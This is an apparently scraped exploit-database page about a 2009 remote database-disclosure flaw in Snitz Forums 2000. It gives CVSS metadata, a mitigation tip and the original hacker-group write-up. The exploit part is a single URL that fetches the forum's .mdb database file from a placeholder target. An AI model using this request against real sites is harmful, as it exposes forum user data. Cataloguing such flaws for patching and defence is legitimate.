header-logo
Suggest Exploit
vendor:
Snitz Forums 2000
by:
ViRuSMaN
7.5
CVSS
HIGH
Remote Database Disclosure
200
CWE
Product Name: Snitz Forums 2000
Affected Version From: Snitz Forums 2000
Affected Version To: Snitz Forums 2000
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Snitz Forums 2000 Remote Database Disclosure Vulnerability

Snitz Forums 2000 is vulnerable to a remote database disclosure vulnerability. An attacker can access the snitz_forums_2000.mdb database file by sending a request to http://[target].com/[path]/snitz_forums_2000.mdb.

Mitigation:

Ensure that the snitz_forums_2000.mdb file is not accessible from the web server.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|


==============================================================================
        [»] ~ Note : if the path of  "snitz_forums_2000.mdb" has been changed this exploit will not work
==============================================================================
        [»] Snitz Forums 2000 Remote Database Disclosure Vulnerability
==============================================================================

    [»] Script:             [ Snitz Forums ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Snitz Forums 2000 - free ASP-based Internet Discussion Forum Software ]
    [»] Download:           [ http://forum.snitz.com/specs.asp ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [»] http://[target].com/[path]/snitz_forums_2000.mdb

Author: ViRuSMaN <-

###########################################################################

Navigation

Suggest Exploit

Services By CQR